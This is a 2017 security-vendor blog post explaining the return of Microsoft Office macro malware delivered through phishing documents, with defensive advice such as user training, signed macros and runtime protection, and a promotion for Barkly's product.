Hiding malicious macros inside Microsoft Office docs has once again become one of the most popular ways for criminals to launch their attacks. Here's everything you need to know about macro malware in 2017.
Unless you’re a newbie to the IT security business, you probably remember when Microsoft Office macros became one of the most popular means of malware delivery in the late 1990s and early 2000s. When Microsoft and others finally locked down their macro mechanisms, the incidence of macro-based malware declined sharply and authors moved on to other methods of infiltration.
But now macro malware has made a comeback, with criminals using it to prey on end-users to get past conventional signature-based AV solutions. It’s also no longer just a Windows problem — macro malware has made the move to Mac, too.
In this post, we’ll take a look at exactly what macro malware is, how it operates, and how you can keep it from rearing its head inside your organization. But first...
Macros are small programs embedded inside another program that automate repetitive tasks.
For example, an accountant might embed a macro into Excel that pulls data from an external database. Or, a Word macro could be used to automate common processes, like adding a digital letterhead to documents or populating reports with a pre-formatted table. They’re also used often in payroll and business intelligence applications.
Macros are simple and easy to configure, requiring no programming experience: creators basically “record” the procedure, then play back the macro each time they want to repeat that process. The simplicity, efficiency, and time savings macros afford make them quite popular, especially for Office programs like Word and Excel — which is also what makes macro malware so effective…the classic double-edged sword.
When Microsoft introduced macro capabilities into its Office suite, the automated scripts were enabled by default. That meant when one individual emailed a macro-embedded Word or Excel document to another, the macro automatically executed when the receiver opened the document. Malware authors soon exploited this functionality, embedding malware executables as macros and emailing the documents to unwitting targets.
Microsoft and others eventually disabled the automatic execution, instead requiring users to manually enable macros on any incoming document. Between that and users becoming wise to the risk of opening suspicious documents or those from uncertain sources, macro malware took a nosedive.
Over the last few years, however, we’ve seen a resurgence of attackers using macros as first-stage downloaders that install their final payloads (typically ransomware or trojans). Here are a few of the most common threats today:
Macro malware is a favorite of hackers for several reasons:
Attacker are able to capitalize on the fact that using and sharing Office documents is baked into most users’ day-to-day work. They don’t have to trick users into downloading suspicious executable files that many AV programs would block anyway. Instead, hackers deliver familiar-looking documents, like reports, invoices, spreadsheets, etc. via phishing emails. All they have to do is make the email itself look convincing enough to get the user to open the document.
While Microsoft may have disabled macros by default in order to thwart macro malware, users often still have the option to re-enable them, and in a busy work environment it’s easy to become blind or indifferent to warnings and alerts. Unfortunately, that can give macro malware direct access to their machines and potentially the entire company’s network, data, and infrastructure.
Here are a few options for protecting your organization from macro malware, listed from most to least demanding:
While it might be a natural conclusion to jump to, simply disabling macros entirely, company-wide isn't always a practical option. Some software and business processes rely on macros for functionality (like Business Intelligence solutions and accountants).
What about only allowing authorized macros? Maybe. Macros do have a signature format that can support allowing only digitally-signed macros to run, but that’s difficult to maintain from an IT perspective, especially as an organization grows.
Microsoft has ramped up macro protection of its Office 2016 and 2013 suites, but as with many other forms of malware, employee education is critical. Train users to spot phishing emails and emphasize the importance of keeping macros disabled — only enabling them if they’re absolutely certain the document and the sender are legit.
As the last, most reliable line of protection against malicious macros, use runtime malware defense that can spot the tell-tale signs of macro-based attacks in system activity and block them automatically before any damage is done.
Rather than just scanning files and attempting to guess which ones are malicious, Barkly’s runtime malware defense monitors for suspicious activity, so even if macro malware does get past traditional AV, it won’t have a chance to unleash its wrath. Watch it in action in the video below:
Get the latest security news, tips, and trends straight to your inbox.
Get the latest security news, tips, and trends stright to your inbox.